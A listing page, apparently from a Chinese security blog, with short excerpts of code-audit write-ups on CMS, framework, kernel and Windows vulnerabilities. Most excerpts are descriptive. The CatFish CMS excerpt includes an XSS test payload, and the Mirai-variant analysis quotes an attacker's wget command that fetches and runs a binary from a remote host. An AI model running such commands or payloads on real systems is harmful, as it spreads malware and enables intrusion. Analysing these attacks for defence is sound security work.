CatFish CMS V4.8.75最新版XSS漏洞审计 代码审计

CatFish CMS V4.8.75最新版XSS漏洞审计

这里用到的是最新版的CatFish CMS V4.8.75,是一款开源免费的个人博客及企业建站系统。 首先在官网下载并安装 安装完成后我们先来看首页,有三个可以做输入的地方:搜索、评论、留言。本着见框就插的原则我们先来看搜索框,我们在搜索框注入测试代码:<script>alert(’1′)</script>再用burp suite改包提交: 我们将keyword的值修改为我们的测试代码后点击forward 可以看到测试代码并没有生效,应该是做了防护过滤,我们继续测试评论功能,这里有个限制,必须先登录再进行评论,我们注册一个...
最新
阅读全文
PHPCMS v9.6.0 wap模块SQL注入 代码审计

PHPCMS v9.6.0 wap模块SQL注入

一、漏洞详情 phpcms v9.6.0 sys_auth 在解密参数后未进行适当校验造成 sql injection。 看下漏洞的关键点,漏洞最终触发 SQL 注入的点是位于 phpcms/modules/content/down.php 的 init 函数中: 在这个函数中,我们可以看到通过 GET 传参 a_k 参数的值,然后调用 sys_auth 方法并传参 DECODE 进行了和 auth_key 字段进行解密,其中 auth_key 是通过 load_config 读取 system 配置,对应的是位于 caches\configs\system...
阅读全文
通过Thinkphp框架漏洞所发现的安全问题 代码审计

通过Thinkphp框架漏洞所发现的安全问题

前言 在一次偶然的机会发现公司某个网站存在thinkphp的远程命令执行漏洞,自此对这个漏洞爱不释手。这究竟是为什么呢?主要原因有2点:第一,如果网站存在这个漏洞,我们可以去执行各种各样的系统命令来进行测试观察,尤其要是还有管理员权限就更舒服了;第二点,只要发现对应版本的thinkphp,漏洞利用步骤较为简单。(主要还是笔者太懒,hhh!!!)关于这个漏洞分析笔者就不在这里献丑了,主要是介绍下如何来去挖掘这个漏洞,以及笔者相关的一些思路。希望能给刚入安全圈的新人一点灵感。 0×01 漏洞简介 在2018年12月9日,thinkphp官方发布了一个重要的安全更新,修复了一个...
阅读全文
WordPress插件Easy WP SMTP反序列化漏洞分析 代码审计

WordPress插件Easy WP SMTP反序列化漏洞分析

WordPress 插件 Easy WP SMTP 最近新出了个漏洞,以前有分析过。不过新的代码好像变化有点大,所以这里花了点时间简单看看。 首先,这个漏洞存在于版本 v1.3.9。我这里能下到最接近的老版本是 v1.3.8,可惜 v1.3.9 更迭了一些重要代码,我找到的版本,应该不能复现这个漏洞。  下面我会根据网上一些细节进行分析,没耐心的大佬可以直接跳到最后,看原版的分析。 关键函数位置在: wp-content/plugins/easy-wp-smtp/easy-wp-smtp.php::admin_init 这里的函数,可以在用户登入 ...
阅读全文
探究PHP中的Mkdir函数 代码审计

探究PHP中的Mkdir函数

一、起因 在复现分析Wordpress-5.0.0 RCE 的时候,因为在写图片的过程中,根据图片的dirname创建目录,而后根据basename写入图片。在目录创建成功的前提下,应该是可以写入文件的。但是情况却不是如此,过程中我要在写目标图片前,必须还要再写一个辅助图片。其实这个辅助图片不是很重要,而重要的是这个辅助图片的目录创建。 此过程中例如需要写入目标文件为: 首先需要先写一张 为什么会这样?假设直接写目标文件,过程中会首先创建目录: 其实这个过程是没有创建任何目录的,因为判断是directory...
阅读全文
Metinfo 6.1.3 XSS漏洞分析 代码审计

Metinfo 6.1.3 XSS漏洞分析

前言 前段时间看到一个cms造成的xss漏洞,这里想分析下。这个漏洞是metinfo6.1.3版本因参数问题造成前台和后台引起了两处xss漏洞。 这个漏洞的影响范围一直到最新版本(6.1.3),因为前段时间爆出的漏洞,所以新版本应该已修复。 cms最新6.13下载地址:https://www.mituo.cn/download/   前台漏洞分析( CVE-2018-20486) 通过在前台插入xss访问,然后会在后台触发xss,造成xss攻击。 漏洞的触发点在admin/login/login_check.php 这里加载了$commonpa...
阅读全文
Linux内核CVE-2017-11176漏洞分析与复现 代码审计

Linux内核CVE-2017-11176漏洞分析与复现

一、漏洞背景 Linux内核中的POSIX 消息队列实现中存在一个UAF漏洞CVE-2017-11176。攻击者可以利用该漏洞导致拒绝服务或执行任意代码。本文将从漏洞成因、补丁分析以及漏洞复现等多个角度对该漏洞进行详细分析。 二、漏洞分析 Posix消息队列允许异步事件通知,当往一个空队列放置一个消息时,Posix消息队列允许产生一个信号或启动一个线程。这种异步事件通知调用mq_notify函数实现,mq_notify为指定队列建立或删除异步通知。由于mq_notify函数在进入retry流程时没有将sock指针设置为NULL,可能导致UAF漏洞。 ...
阅读全文
drupal8系列框架和漏洞动态调试深入分析 代码审计

drupal8系列框架和漏洞动态调试深入分析

前言 在drupal框架中,比较经典又离我们最近的莫过于18年的CVE-2018-7600这个漏洞了。但是通过本人阅读和学习过此漏洞分析文章的过程中,发现都是针对于此漏洞点的详细分析。相对于此框架运行流程不是很熟悉的人可能在阅读完后很难理解。 作为阿尔法实验室的一员,本人通过阅读框架相关文档与漏洞分析的相关文章和自己对框架源码的调试,对框架运行的流程有了进一步的了解。 在此把这些分享给大家,本文主要分为两大部分: 第一部分是对drupal框架流程的简介(这里主要针对8.x系列),让我们知道在symfony开源框架基础上的drupal框架是如何利用监听者...
阅读全文
类型混淆漏洞实例浅析 代码审计

类型混淆漏洞实例浅析

类型混淆漏洞一般是将数据类型A当做数据类型B来解析引用,这就可能导致非法访问数据从而执行任意代码。 本文通过IE类型混淆漏洞实例和Word类型混淆漏洞实例进行分析,来学习理解类型混淆漏洞原理。  实例一:IE/Edge类型混淆漏洞(CVE-2017-0037) 漏洞原因:函数处理时,没有对对象类型进行严格检查,导致类型混淆。 分析环境:Win7、IE11 分析工具:Windbg、od、IDA Pro 在PoC中定义了一个table,标签中定义了表id为th1,在boom()中引用,然后是setInterval设定事...
阅读全文
利用Thinkphp漏洞传播的Mirari新变种分析 代码审计

利用Thinkphp漏洞传播的Mirari新变种分析

一、概述 12月底,通过安全设备检测到几个不同的IP试图对几个公司内部的网站进行漏洞攻击。通过攻击日志发现攻击IP使用了于2018年12月12日爆出的ThinkPHP远程代码执行漏洞(CNVD-2018-24942),攻击者利用该漏洞,可在未授权的情况下远程执行代码。 下图为攻击日志: 攻击者试图在被攻击服务器上执行如下命令: ‘Cd /tmp;wget http://cnc.junoland.xyz/bins/egg.x86;cat egg.x86> lzrd;chmod 777 lzrd;./lzrd ‘ 同时从该恶意文件存放网站上还发现了arm,...
阅读全文
thinkphp 5.x漏洞分析 代码审计

thinkphp 5.x漏洞分析

根据网上发布关于thinkphp 5.x远程代码执行漏洞预警,分析漏洞发生点,对比官方git更新版本,对照发现更新为request类,如下图所示: 观察发生更改的点为pathinfo()、method()、param()、post()、request()和cache()方法上,由此预测漏洞发生可能与这几个方法有关,进入5.0.10版本request.php中,如下图所示: 最后返回一个input方法,跟踪input方法,如下图所示:安全脉搏:https://www.secpulse.com/archives/95012.html ...
阅读全文
Windows 0day任意文件覆盖漏洞分析与验证 代码审计

Windows 0day任意文件覆盖漏洞分析与验证

漏洞名称 windows任意文件覆盖。 漏洞介绍 安全研究员SandboxEscaper披露Windows操作系统中第四个0-day漏洞的漏洞利用代码,利用该漏洞可以覆盖任意Windows10文件,包括通常无法访问的基本文件,例如SandboxEscaper在POC中给出的pci.sys文件,直接造成系统拒绝服务,当然可以用此方法来关闭第三方杀软,原文如下: 其漏洞发生模块为WER(Windows error report),WER是一个灵活的基于事件的反馈基础架构,用户收集硬件和软件发生问题时进行异常回收,然后发送给Microsoft,并给用户提示合适的异常...
阅读全文